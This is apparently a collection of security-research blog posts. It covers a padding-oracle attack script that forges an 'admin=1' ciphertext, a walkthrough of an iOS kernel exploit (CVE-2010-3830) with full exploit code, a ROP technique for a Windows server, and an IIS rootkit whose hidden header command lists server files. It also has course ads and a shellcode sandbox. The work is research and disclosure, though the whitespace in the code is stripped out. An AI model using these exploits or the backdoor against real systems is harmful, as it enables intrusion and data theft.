verbose=0if(len(sys.argv)<2):usage()if((len(sys.argv)>2)and(sys.argv[2]=="-v")):verbose=1if(sys.argv[1]=="-c"):plainText=raw_input("Text to encrypt: ")oracle=MyPaddingOracleServer()oracle.encrypt(plainText)elif(sys.argv[1]=="-d"):cypher=raw_input("Value to decrypt (IV + Ciphered text): ")oracle=MyPaddingOracleServer()print"Decrypted value: "+oracle.decrypt(cypher)else:usage()

C:\>python pyPaddOracle.py -cText to encrypt: hello!Padded text: 68656c6c6f202101Ciphered value (IV + ciphertext): 1712180527255516c818194b4aa8dc91C:\>python pyPaddOracle.py -dValue to decrypt (IV + ciphertext): 1712180527255516c818194b4aa8dc91Decrypted value: 68656c6c6f202101C:\>python pyPaddOracle.py -dValue to decrypt (IV + ciphertext): 0000000000000000c818194b4aa8dc91Traceback (most recent call last):  File "pyPaddOracle.py", line 152, in <module>    print "Decrypted value: " + oracle.decrypt(cypher)  File "pyPaddOracle.py", line 34, in decrypt    raise Exception("Error: bad padding!")Exception: Error: bad padding!

class MyPaddingOracleServer:  key = 'iloveyouihateyou'  iv = '1712180527255516'.decode('hex')  def is_pkcs7_padding_valid(self,block):    c = block[-1]    return block[-ord(c):] == ord(c) * c  def decrypt(self,ciphered):    ciphered = ciphered.decode('hex')    self.iv = ciphered[0:DES3.block_size]    cipher = DES3.new(self.key,DES3.MODE_CBC,self.iv)    uncipher = cipher.decrypt(ciphered[DES3.block_size:])    if not self.is_pkcs7_padding_valid(uncipher):      raise Exception("Error: bad padding!")    else:      return uncipher.encode('hex')

classVeryBadHacker:currentBlock='\x00\x00\x00\x00\x00\x00\x00\x00'IVoriginal='\x00\x00\x00\x00\x00\x00\x00\x00'intVal='\x00\x00\x00\x00\x00\x00\x00\x00'iv='\x00\x00\x00\x00\x00\x00\x00\x00'oracle=MyPaddingOracleServer()verbose=0

classVeryBadHacker:defuncipherValue(self,value):uncipheredValue=""nbBlock=len(value)/(DES3.block_size)-1nCurrentBlock=1if(self.verbose):print'Number of blocks: '+str(nbBlock)self.IVoriginal=value[0:DES3.block_size]self.currentBlock=value[DES3.block_size*nCurrentBlock:DES3.block_size*(nCurrentBlock+1)]while(nCurrentBlock<=nbBlock):uncipheredValue+=self.uncipherBlock(self.currentBlock)nCurrentBlock=nCurrentBlock+1self.IVoriginal=self.currentBlockself.currentBlock=value[DES3.block_size*nCurrentBlock:DES3.block_size*(nCurrentBlock+1)]return"Deciphered value: "+uncipheredValue

classVeryBadHacker:defuncipherBlock(self,block):if(self.verbose):print"Ciphered block: "+block.encode('hex')print"Original IV: "+self.IVoriginal.encode('hex')currentByte=0x8goodPaddingValue=0x1while(currentByte>0):if(self.verbose):print"Deciphering byte "+str(currentByte)print"Good padding value: "+str(goodPaddingValue)format="%0"+str(2*currentByte)+"x"+self.iv[2*currentByte:2*DES3.block_size]# bruteforce the IV until good padding response from the oracleforself.ivin[format%iforiinxrange(0,0xFF+1)]:try:self.oracle.decrypt(self.iv+block.encode('hex'))exceptException:continueelse:break;if(self.verbose):print"IV found to generate valid padding value: "+self.iv# we know the plain text thanks to the valid padding responsevectPadd=("%02x"%(goodPaddingValue))*goodPaddingValue# we can calculate the intermediate valuesself.intVal="%016x"%(int(self.iv,16)^int(vectPadd,16))if(self.verbose):print"Intermediates Values vector: "+self.intValprint'Deciphering byte '+str(currentByte)+' done!'# prepare data for next bytecurrentByte=currentByte-1goodPaddingValue=goodPaddingValue+1vectPadd=("%02x"%(goodPaddingValue))*(goodPaddingValue-1)# we calculate last byte of bruteforced IVself.iv="%016x"%(int(self.intVal,16)^(int(vectPadd,16)))if(self.verbose):print"New IV for next round: "+self.ivprint"\n"# all block deciphered - XORing intVal with the original IV to find the plain textunciphered="%016x"%((int(self.IVoriginal.encode('hex'),16))^(int(self.intVal,16)))if(self.verbose):print"Intermediate values found for this block: "+self.intValreturnunciphered

...elif(sys.argv[1]=="-u"):ivan=VeryBadHacker(verbose)cipheredValue=raw_input("Value to decrypt: ")printivan.uncipherValue(cipheredValue.decode('hex'))elif(sys.argv[1]=="-x"):ivan=VeryBadHacker(verbose)plain=raw_input("Text to encrypt: ")cipher=raw_input("Valid ciphered value: ")printivan.cipherPlainText(plain,cipher.decode('hex'))else:usage()

C:\>python pyPaddOracle.py -u -vValue to decrypt: 1712180527255516ff7ac1e450628bccNumber of blocks: 1Ciphered block: ff7ac1e450628bccOriginal IV: 1712180527255516Deciphering byte 8Good padding value: 1IV found to generate valid padding value: 0000000000000016Intermediates Values vector: 0000000000000017Deciphering byte 8 done!New IV for next round: 0000000000000015Deciphering byte 7Good padding value: 2IV found to generate valid padding value: 0000000000006715Intermediates Values vector: 0000000000006517Deciphering byte 7 done!New IV for next round: 0000000000006614Deciphering byte 6Good padding value: 3IV found to generate valid padding value: 00000000001b6614Intermediates Values vector: 0000000000186517Deciphering byte 6 done!New IV for next round: 00000000001c6113Deciphering byte 5Good padding value: 4IV found to generate valid padding value: 000000004d1c6113Intermediates Values vector: 0000000049186517Deciphering byte 5 done!New IV for next round: 000000004c1d6012Deciphering byte 4Good padding value: 5IV found to generate valid padding value: 000000694c1d6012Intermediates Values vector: 0000006c49186517Deciphering byte 4 done!New IV for next round: 0000006a4f1e6311Deciphering byte 3Good padding value: 6IV found to generate valid padding value: 0000736a4f1e6311Intermediates Values vector: 0000756c49186517Deciphering byte 3 done!New IV for next round: 0000726b4e1f6210Deciphering byte 2Good padding value: 7IV found to generate valid padding value: 0071726b4e1f6210Intermediates Values vector: 0076756c49186517Deciphering byte 2 done!New IV for next round: 007e7d6441106d1fDeciphering byte 1Good padding value: 8IV found to generate valid padding value: 7e7e7d6441106d1fIntermediates Values vector: 7676756c49186517Deciphering byte 1 done!New IV for next round: 7f7f7c6540116c1eIntermediate values found for this block: 7676756c49186517Deciphered value: 61646d696e3d3001

classVeryBadHacker:defcipherPlainText(self,plain,cipher):IVoriginal=cipher[0:DES3.block_size]plain=self.oracle.pkcs7(plain,DES3.block_size)nbBlock=len(plain)/(DES3.block_size)blocks=[plain[DES3.block_size*i:DES3.block_size*i+DES3.block_size]foriinrange(len(plain)/DES3.block_size)]res=cipher[DES3.block_size:2*DES3.block_size]# actual cipher = iv + first block encryptedactualCipher=cipher[0:2*DES3.block_size]while(nbBlock>0):# we decrypt the cipher to recuperate the intermediate valuesself.uncipherValue(actualCipher)# we calculate the iv necessary for the plain text blocknewIV="%016x"%(int(self.intVal,16)^int(blocks[nbBlock-1].encode('hex'),16))if(self.verbose):print'Actual cipher: '+actualCipher.encode('hex')print'IV found for this cipher: '+newIVres=newIV.decode('hex')+res# now the cipher becomes iv original + last iv foundactualCipher=IVoriginal+newIV.decode('hex')nbBlock=nbBlock-1return"Ciphered value for \""+plain+"\" is "+res.encode('hex')

C:\>python pyPaddOracle.py -x -vText to encrypt: Hello World!Valid ciphered value: 1712180527255516ff7ac1e450628bccCiphered block: ff7ac1e450628bccOriginal IV: 1712180527255516Actual cipher: 1712180527255516ff7ac1e450628bccIV found for this cipher: 041a114c681b6614Ciphered block: 041a114c681b6614Original IV: 1712180527255516Actual cipher: 1712180527255516041a114c681b6614IV found for this cipher: 72eb88a38ca96879Ciphered value for "Hello World!???" is 72eb88a38ca96879041a114c681b6614ff7ac1e450628bcc

C:\>python pyPaddOracle.py -dValue to decrypt (IV + Ciphered text): 72eb88a38ca96879041a114c681b6614ff7ac1e450628bcc50628bccValue decrypted: 48656c6c6f20576f726c642021030303C:\>pythonPython 2.6 (r26:66721, Oct  2 2008, 11:35:03) [MSC v.1500 32 bit (Intel)] on win32Type "help", "copyright", "credits" or "license" for more information.>>> "48656c6c6f20576f726c642021030303".decode('hex')'Hello World!\x03\x03\x03'

C:\>python pyPaddOracle.py -xText to encrypt: admin=1Valid ciphered value: 1712180527255516ff7ac1e450628bccCiphered value for "admin=1?" is: 1712180527255416ff7ac1e450628bcc

FormsAuthentication.Decrypt(String)

System.Web.Security

MachineKeySection.EncryptOrDecryptData(false,buf,null,0,buf.Length,IVType.Random);

FlushFinalBlock();

RijndaelManagedTransform.TransformFinalBlock(byte[]inputBuffer,intinputOffset,intinputCount);

DecryptData(inputBuffer,inputOffset,inputCount,refbuffer2,0,this.m_paddingValue,true);

...
<scriptsrc="/WebResource.axd?d=qFJFyuhQM8t4fs_ZevAowA2&amp;t=634190010246548951"type="text/javascript"></script>
...

ProcessRequest(HttpContextcontext)

DecryptString(str)

This post will describe a recent iPhone kernel vulnerability discovered by comex and used in the limera1n and Greenpois0n jailbreaking tools. Both tools exploit a BootROM vulnerability found by geohot to get initial code execution on the device, and comex's kernel exploit is then used to make the jailbreak untethered, i.e to persist after a reboot. This kernel vulnerability was patched with the release of iOS 4.2.1 on November 22.

The goal of jailbreaking tools is to patch the iPhone operating system kernel in order to circumvent the code signing checks and thus being able to run any application. On older devices (iPhone 3g and below) it is possible to break the entire chain of trust and modify the kernel binary stored on flash memory. On newer devices (not vulnerable to the Pwnage or 24kpwn exploits) this is no longer possible, or at least there is no public bootchain-breaking exploit. Thus, one has to find another way to keep the jailbroken state (patched kernel) when the device is shut down or rebooted.

The userland jailbreak technique introduced by comex with the Spirit jailbreak earlier this year leaves the kernel image untouched and exploits a kernel vulnerability at every boot. The kernel exploit code is run as root in the context of the first userland process (launchd), using what was dubbed as the "Incomplete Codesign exploit". The idea is that since the iOS code signing mechanism only applies on code segments, it is possible to use (or abuse) some features of the Mach-O file format and the dynamic loader (dyld) to kickstart a ROP payload without ever having to codesign anything. This part of the jailbreak won't be covered here but probably in a next blogpost. Hence, the following exploit discussion assumes root code execution has already been achieved.

The CVE-2010-3830 kernel vulnerability is located in the BSD pf packet filter of the xnu kernel, and can be triggered from userland through the /dev/pf special file. The following exploit code was pushed on comex's github on September 30 :

intmain(){unsignedinttarget_addr=CONFIG_TARGET_ADDR;unsignedinttarget_addr_real=target_addr&~1;unsignedinttarget_pagebase=target_addr&~0xfff;unsignedintnum_decs=(CONFIG_SYSENT_PATCH_ORIG-target_addr)>>24;assert(MAP_FAILED!=mmap((void*)target_pagebase,0x2000,PROT_READ|PROT_WRITE,MAP_ANON|MAP_PRIVATE|MAP_FIXED,-1,0));unsignedshort*p=(void*)target_addr_real;if(target_addr_real&2)*p++=0x46c0;// nop*p++=0x4b00;// ldr r3, [pc]*p++=0x4718;// bx r3*((unsignedint*)p)=(unsignedint)&ok_go;assert(!mprotect((void*)target_pagebase,0x2000,PROT_READ|PROT_EXEC));// Yes, reopening is necessarypffd=open("/dev/pf",O_RDWR);ioctl(pffd,DIOCSTOP);assert(!ioctl(pffd,DIOCSTART));unsignedintsysent_patch=CONFIG_SYSENT_PATCH;while(num_decs--)pwn(sysent_patch+3);assert(!ioctl(pffd,DIOCSTOP));close(pffd);assert(!mlock((void*)((unsignedint)(&ok_go)&~0xfff),0x1000));assert(!mlock((void*)((unsignedint)(&flush)&~0xfff),0x1000));assert(!mlock((void*)target_pagebase,0x2000));#ifdef DEBUGprintf("ok\n");fflush(stdout);#endifsyscall(0);#ifdef DEBUGprintf("we're out\n");fflush(stdout);#endif//...}//...staticvoidpwn(unsignedintaddr){structpfioc_transtrans;structpfioc_trans_etrans_e;structpfioc_pooladdrpp;structpfioc_rulepr;memset(&trans,0,sizeof(trans));memset(&trans_e,0,sizeof(trans_e));memset(&pr,0,sizeof(pr));trans.size=1;trans.esize=sizeof(trans_e);trans.array=&trans_e;trans_e.rs_num=PF_RULESET_FILTER;memset(trans_e.anchor,0,MAXPATHLEN);assert(!ioctl(pffd,DIOCXBEGIN,&trans));u_int32_tticket=trans_e.ticket;assert(!ioctl(pffd,DIOCBEGINADDRS,&pp));u_int32_tpool_ticket=pp.ticket;pr.action=PF_PASS;pr.nr=0;pr.ticket=ticket;pr.pool_ticket=pool_ticket;memset(pr.anchor,0,MAXPATHLEN);memset(pr.anchor_call,0,MAXPATHLEN);pr.rule.return_icmp=0;pr.rule.action=PF_PASS;pr.rule.af=AF_INET;pr.rule.proto=IPPROTO_TCP;pr.rule.rt=0;pr.rule.rpool.proxy_port[0]=htons(1);pr.rule.rpool.proxy_port[1]=htons(1);pr.rule.src.addr.type=PF_ADDR_ADDRMASK;pr.rule.dst.addr.type=PF_ADDR_ADDRMASK;//offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) = 0x4a4pr.rule.overload_tbl=(void*)(addr-0x4a4);errno=0;assert(!ioctl(pffd,DIOCADDRULE,&pr));assert(!ioctl(pffd,DIOCXCOMMIT,&trans));pr.action=PF_CHANGE_REMOVE;assert(!ioctl(pffd,DIOCCHANGERULE,&pr));}

The vulnerability is located in the DIOCADDRULEioctl handler, due to improper initialization of the overload_tbl field, which can be later exploited in the DIOCCHANGERULE handler. The following code snippet shows the relevant parts of those handlers :

//bsd/net/pf_ioctl.cstaticintpfioctl(dev_tdev,u_longcmd,caddr_taddr,intflags,structproc*p){//...switch(cmd){//...caseDIOCADDRULE:{structpfioc_rule*pr=(structpfioc_rule*)addr;structpf_ruleset*ruleset;//...//copy structure passed from userspacebcopy(&pr->rule,rule,sizeof(structpf_rule));rule->cuid=kauth_cred_getuid(p->p_ucred);rule->cpid=p->p_pid;rule->anchor=NULL;rule->kif=NULL;TAILQ_INIT(&rule->rpool.list);/* initialize refcounting */rule->states=0;rule->src_nodes=0;rule->entries.tqe_prev=NULL;//...if(rule->overload_tblname[0]){if((rule->overload_tbl=pfr_attach_table(ruleset,rule->overload_tblname))==NULL)error=EINVAL;elserule->overload_tbl->pfrkt_flags|=PFR_TFLAG_ACTIVE;}//...caseDIOCCHANGERULE:{//...if(pcr->action==PF_CHANGE_REMOVE){pf_rm_rule(ruleset->rules[rs_num].active.ptr,oldrule);ruleset->rules[rs_num].active.rcount--;}//...}//...}

The rule field of the pfioc_rule structure passed from userland is copied into a kernel buffer, and then some of the structure fields are reinitialized. However, if rule->overload_tblname[0] `` is zero, the ``rule->overload_tbl pointer won't be initialized properly and will retain the value passed from userland. When the rule is removed, the pf_rm_rule function calls pfr_detach_table which in turn decrements a reference counter using the invalid pointer, allowing an arbitrary decrement anywhere in kernel memory :

//bsd/net/pf_ioctl.cvoidpf_rm_rule(structpf_rulequeue*rulequeue,structpf_rule*rule){if(rulequeue!=NULL){if(rule->states<=0){/*             * XXX - we need to remove the table *before* detaching             * the rule to make sure the table code does not delete             * the anchor under our feet.             */pf_tbladdr_remove(&rule->src.addr);pf_tbladdr_remove(&rule->dst.addr);if(rule->overload_tbl)pfr_detach_table(rule->overload_tbl);}//...}//bsd/net/pf_table.cvoidpfr_detach_table(structpfr_ktable*kt){lck_mtx_assert(pf_lock,LCK_MTX_ASSERT_OWNED);if(kt->pfrkt_refcnt[PFR_REFCNT_RULE]<=0)printf("pfr_detach_table: refcount = %d.\n",kt->pfrkt_refcnt[PFR_REFCNT_RULE]);elseif(!--kt->pfrkt_refcnt[PFR_REFCNT_RULE])//arbitrary decrement happens herepfr_setflags_ktable(kt,kt->pfrkt_flags&~PFR_TFLAG_REFERENCED);}

In order to decrement the dword at address addr, the pwn function of comex's exploit sets the pr.rule.overload_tbl to addr minus 0x4a4, which is the value of offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) on a 32 bit architecture. The exploit decrement the syscall 0 handler address in the sysent array which holds function pointers for all system calls. A trampoline shellcode is mapped at a specific address chosen so that only the most significant byte of the original pointer has to be decremented (the minimum amount to move the pointer from kernel space down to user space). This trampoline will simply call the ok_go C function which will patch various functions in the kernel to perform the jailbreak : make code signing checks return true, disable W^X policy, and restore the overwritten syscall handler.

This vulnerability is also present in other BSD operating systems using the pf module. However, since exploitation requires root privileges to access the /dev/pf file, the impact on those systems is minor.Apple's patch in iOS 4.2.1 added a function to safely initialize the pf_rule structures in the DIOCADDRULE and DIOCGETRULE handlers. A similar patch was recently committed into the OpenBSD CVS repository.

Today we'll discuss how metasm can be used to work with a process memory dump, and also how to search for gadgets suitable for a short ROP sequence.

While working on a vulnerability on a windows server, we had the following premises:

• Non-executable heap
• Randomised address space (except for the main binary)
• We had the address of a buffer we control
• Small stack overflow
• Additional flaw allowing to read arbitrary 4bytes anywhere

From there, the tactic was simple:

• Inject our shellcode in the buffer
• Find the address of VirtualProtect
• Jump on it to make the buffer executable
• Return to the shellcode

We chose the easy path: determine the base address of kernel32. This is done by finding a pointer to k32 somewhere, the main binary IAT sounded like a good candidate. You just have to be careful to not use the address of some kernel32 import that is actually forwarded to some other library, like ntdll.

Once you have a pointer to some part of the library, you then scan backward, 0x10000 bytes at a time, until you find the MZ header. We were unsure of the version of the dll that was present on the server, so we used the read4 repeatedly to dump the whole library image from the process memory. On recent windows versions, you have to be careful, as some libraries include a virtual address gap, usually right after the PE header ; you need to jump over it, if you try to read this area the target will crash and you need to start all over again.

So this gave us the raw memory dump of the kernel32 module (fill the memory gap with zeroes). Now how can we work with it ? The usual tools are pretty useless there, they only handle disk images, and the memory image has not the exact same layout: PE sections are loaded at their memory offset, which is (usually) different from the disk file offset.

This was the time to unsheath Metasm. The standard disassembler GUI has the handy option --exe to change the default auto-determined file type. This way, we can tell that the PE file is a memory image, by using the LoadedPE class, generally used by the debugger, instead of the standard PE class.

Once in the GUI, type gvirtualp to find the address of the function we need (g opens the goto dialog, where we can put a fragment of a label name. If the fragment is ambiguous, this will pop a list of all the possible completions).

Additionally, we need to execute our shellcode.Now that we have given it RWX memory permissions, we still need to divert EIP to it; for that we will use a simple Return Oriented Programming sequence:

• pop eax; retput the address of our buffer in eax
• mov esp, eax; retstack points to our buffer
• jmp espexecute the shellcode in the buffer

To find those in the library, we can use the brand new findgadget.rb disassembler plugin.

You can load it using ctrl+r, then type dasm.load_plugin \"findgadget\", or click the menu/action/run ruby plugin.

Once loaded, type the G key (or menu/action/scan for gadget), and type your asm in the box.You can separate instructions with ';' or spaces.

So, the magic commandline:

ruby samples/disassemble-gui.rb--exe LoadedPE -P findgadget k32_dump.bin

Job done.

Also, hacky new year !

Jean-Baptiste and Guillaume will give a course about malicious document analysis during the next CanSecWest Dojo session at Vancouver (March 7th/8th).

The course deals with two major cases: PDF and Microsoft Office documents. Nowadays those two file formats have become a common vector to exploit end-user systems. Their respective vendor implementations, namely Adobe Reader and MS Office, are regularly prone to multiple vulnerabilities and antivirus software are merely overtaken by the complexity of these formats. Indeed, they are complex formats.

If you ever want to understand the inner workings of a malicious document, you will have to face that complexity and master the use of the proper tools to save you a lot of time without reinventing the wheel.You will there learn to use the OffVis tool and the Origami framework applied to authentic cases of exploits analysis. OffVis is the official Microsoft Office Visualization Tool, and Origami is a powerful Ruby framework for malicious PDF analysis created by one of the teacher of this course.

How to know if a document is malicious or not? How to extract its payload and analyze it? By the end of the day, you will have:

• Understood the file formats of MS Office and PDF documents
• Analyzed real MS Office and PDF exploits in practice

You will find below the detailed agenda for this one-day course.We are waiting for you!

In this article I will explain how I designed a rootkit for Microsoft Internet Information Services (IIS).The question is: why a backdoor in a web server?

First obvious but useless answer: because we can.

Ok, let us give a more clever answer. The purpose of backdooring a web sever is double:

• It allows the attacker to access data sent by the clients. For instance, if the web site is password protected, we can retrieve this password.
• It allows to backdoor on the fly anything sent from the server to the web client.

This second point is especially interesting as it allows the attacker to inject the proper exploit according to the web browser requesting the web page, or to infect an executable downloaded from the server.

typedefstruct_EXTENSION_CONTROL_BLOCKEXTENSION_CONTROL_BLOCK{DWORDcbSize;DWORDdwVersion;HCONNconnID;DWORDdwHttpStatusCode;charlpszLogData[HSE_LOG_BUFFER_LEN];LPSTRlpszMethod;LPSTRlpszQueryString;LPSTRlpszPathInfo;LPSTRlpszPathTranslated;DWORDcbTotalBytes;DWORDcbAvailable;LPBYTElpbData;LPSTRlpszContentType;BOOL(WINAPI*GetServerVariable)();BOOL(WINAPI*WriteClient)();BOOL(WINAPI*ReadClient)();BOOL(WINAPI*ServerSupportFunction)();}EXTENSION_CONTROL_BLOCK;

typedefstruct_HTTP_FILTER_LOGHTTP_FILTER_LOG{constchar*pszClientHostName;constchar*pszClientUserName;constchar*pszServerName;constchar*pszOperation;constchar*pszTarget;constchar*pszParameters;DWORDdwHttpStatus;DWORDdwWin32Status;DWORDdwBytesSent;DWORDdwBytesRecvd;DWORDmsTimeForProcessing;}HTTP_FILTER_LOG,*PHTTP_FILTER_LOG;

typedefstructFILTER_LIST{unsignedintMagic;"FLIS"unsignedintunknown;unsignedintNumberOfFilters;PHTTP_FILTER_DLL*FilterPointerArray;unsignedintunknown2[10];unsignedintFlags1Sum;unsignedint*Flags1;unsignedintunknown3[10];unsignedintFlags2Sum;unsignedint*Flags2;}FILTER_LIST,*PFILTER_LIST;

struct_HTTP_FILTER_DLL{unsignedintMagic;"FDLL"PHTTP_FILTER_DLLpPrevious;PHTTP_FILTER_DLLpNext;void*ModuleBaseAddress;void*HttpFilterProc;void*GetFilterVersion;void*TerminateFilter;unsignedintunknown1;unsignedintAcceptFlags1;unsignedintAcceptFlags2;unsignedintunknown2;char*DllPath;unsignedintunknown3;unsignedintunknown4;charString[DLL_PATH_SIZE];unsignedintunknown5;}HTTP_FILTER_DLL,*PHTTP_FILTER_DLL;

GET /pwet.htm HTTP/1.1
Host: 192.168.73.143
Accept-Encoding: identity
Connection: Keep-Alive
Content-type: application/x-www-form-urlencoded
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 12:16:50 GMT
Content-Length: 31
Content-Type: text/html
Last-Modified: Mon, 21 Jun 2010 11:53:19 GMT
Accept-Ranges: bytes
ETag: "963779573811cb1:994"
Server: Microsoft-IIS/6.0

<html>

Pouetpouet

</html>

GET /pwet.htm HTTP/1.1
Host: 192.168.73.143
Accept-Encoding: identity
X-Order: ListDir
Connection: Keep-Alive
X-Data: Qzpc
Content-type: application/x-www-form-urlencoded
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 12:16:57 GMT
Content-Length: 353
X-Resp: OK
Content-Type: text/html
Last-Modified: Mon, 21 Jun 2010 11:53:19 GMT
Accept-Ranges: bytes
ETag: "963779573811cb1:994"
Server: Microsoft-IIS/6.0

<html>

Pouetpouet

</html>
[F] C:\AUTOEXEC.BAT
[F] C:\boot.ini
[F] C:\bootfont.bin
[F] C:\CONFIG.SYS
[D] C:\Documents and Settings
[D] C:\Inetpub
[F] C:\IO.SYS
[F] C:\MSDOS.SYS
[F] C:\NTDETECT.COM
[F] C:\ntldr
[F] C:\pagefile.sys
[D] C:\Program Files
[D] C:\System Volume Information
[D] C:\WINDOWS
[D] C:\wmpub

Yoann 'jj' Guillot will also be giving a course about advanced binary deobfuscation, during the next CanSecWest Dojo session in Vancouver (March 7th/8th).

The course will teach you how to overcome state-of-the-art binary obfuscation.

You will see, and learn to defeat :

• traditional junk,
• arithmetic code hiding,
• code flattening,
• and virtual-machine based obfuscation schemes.

This will be accomplished using the metasm framework, which is already known in this field.Yoann, as the main developper of the framework, will teach you the most efficient ways to reach your goals.

The course is a reedition of last year's dojo, improved based on students feedback.It now fits in one day, with only the most relevant parts kept in, for an even more didactic training session.

In the end of the day, you'll be well armed to face heavily protected binaries, and pierce through their various obfuscation layers.

Register now !monday 3/7 | tuesday 3/8

Here at the R&D lab we use mercurial for our code versionning.

One of the problems we faced was that sometimes we would commit big files like pdfs or raw data into a repository.This is fine, as long as the repository remains for internal eyes only.Then at some point later, we want to publish our code, but having such garbage in the repository is totally not cool.

So I wrote this tool.

Basically, it allows you to clone a part of an existing repository, keeping the history intact (commit date, author, and message), while applying a filter on the tracked files.

So now we can duplicate our repository, while purging all traces of our ugly data file ; but we can also split a repository holding both code and documentation to two separate repositories, etc.

Usage: hgsplit [options]
    -s, --repo <path>                path to the repository to split
    -d, --subrepo <path>           path to the directory that will hold the repo
    -x, --exclude                        ignore files in the filelist, include all others
    -r, --regex                           the file list is a list of regexps
    -i, --initial-commit <commitid>  start from this commit (linear commit number - 0 == init)
    -f, --final-commit <commitid>    end at this commit (linear commit number)
    -v, --verbose                       be verbose
    -l, --list <listfile>                 file holding a list of files, one per line

# first, make a copy of the repo just to be safe
$ hg clone repo repo_copy

# split the repo, ignoring all files matching the given regexp
$ ruby hgsplit.rb -s repo_copy -d repo_clean -r -x '\.raw$'
subrepository saved to repo_clean/, saved 34 changes from 35 total.

# now we can shamelessly publish our code
$ rm -r repo_copy
$ cd repo_clean
$ hg push git+ssh://github.com/me/awesome_repo/

While coding and debugging some low-level stuff I sometime need to write a little piece of assembly code to see if i'm right. Until now, I was writing code into a process debugged with OllyDbg, and steping it. Pretty ugly, but it works when you want to know what a "smsw eax" is doing. Last time, I was confronted to the X64 reality, where no public tool like OllyDbg allow you to debug a 64-bit process on Windows. So I decided to write a little application to see how some 64-bit instructions are running.

Just for the fun I started this project on Linux X86_64, and just because it's cool the code is running into a "sandboxed" environment.

I know Linux provides a nice feature for hardened sandboxing called SECCOMP. The idea is, you can only use 4 syscalls: read(), write(), exit() and sigreturn. Of course read() and write() can only be called on existing opened file descriptors, so this can be pretty safe.This feature is even use by Chrome for its Linux sandbox. If you are interested, more details are given by Nicolás Bareil in Sandboxing based on SECCOMP for Linux kernel.

Also, I'm using Linux X86_64 but I wanted to run both 64-bit and 32-bit code snippets without having 2 different processes. You know 64-bit kernels (CONFIG_X86_64) allow you to run 32-bit native applications if you compile in support for CONFIG_IA32_EMULATION.

A few words about X64 computing. For the CPU this mode is called IA-32e mode (or long-mode). To enable it you need to set bit LME (Long Mode Enabled) in MSR IA32_EFER (see Intel manual vol 3A : Initializing IA-32e Mode). Then if you want to run 64-bit code your must setup a code segment (CS) with bit L (64-bit code segment) at 1 and D (operand-size) to 0. (Intel manual vol 3A: Segment Descriptors).So if you want to run both 32-bit and 64-bit code with the same kernel, you must have at least two segment descriptors in your GDT, or have 2 GDTs (General Descriptor Table). One entry must have L=1 and D=0, for 64-bit code, and the other L=0 and D=1 for 32-bit code. Linux uses 1 GDT, with 2 segments named GDT_ENTRY_DEFAULT_USER_CS and GDT_ENTRY_DEFAULT_USER32_CS. For your indication cs64=0x33 (RPL:3 TABLE:0 INDEX:6) and cs32=0x23 (RPL:3 TABLE:0 INDEX:4)

So if you want to run pure 32-bit code into a 64-bit task you "just" need to update your segment selector. This task can be hard because you cannot just change your CS segment selector with a MOV instruction, other ways are provided to do this.

In order to perform this hack I chose the famous Metasm framework. So here is my configuration:

ivan@converge:~$ ruby -v
ruby 1.8.7 (2010-08-16 patchlevel 302) [x86_64-linux]ivan@converge:~$  hg clone https://metasm.cr0.org/hg/metasm
requesting all changesadding changesetsadding manifestsadding file changesadded 2239 changesets with 4294 changes to 306 filesupdating to branch default217 files updated, 0 files merged, 0 files removed, 0 files unresolvedivan@converge:~$exportRUBYLIB=~/metasm

For my POC i want to have my Ruby process and:

• Grab some assembly (64 or 32) and compile it.
• Create a subprocess with restrictions: limited access to resources and SECCOMP mode enabled. The subprocess can exchange with his parent only via a dedicated pipe.
• Run the shellcode in a basic environment. All GPRs (General Purpose Register) cleared and a clean stack. Code and data segments are flats (they address all the memory). FS and GS are not supported.
• Read the result with the parent. I'll use the GPRs final values as result.

asm=Metasm::Shellcode.assemble(Metasm::X86_64.new,shellcode_src).encode_string

dl=Metasm::DynLdrdl.new_func_c<<EOSint close(int);void closefds(int max, int keep){        int fd;        for(fd=0; fd<=max; fd++)                if(keep!=fd)                        close(fd);}EOSdl.closefds(maxfd,wr.fileno)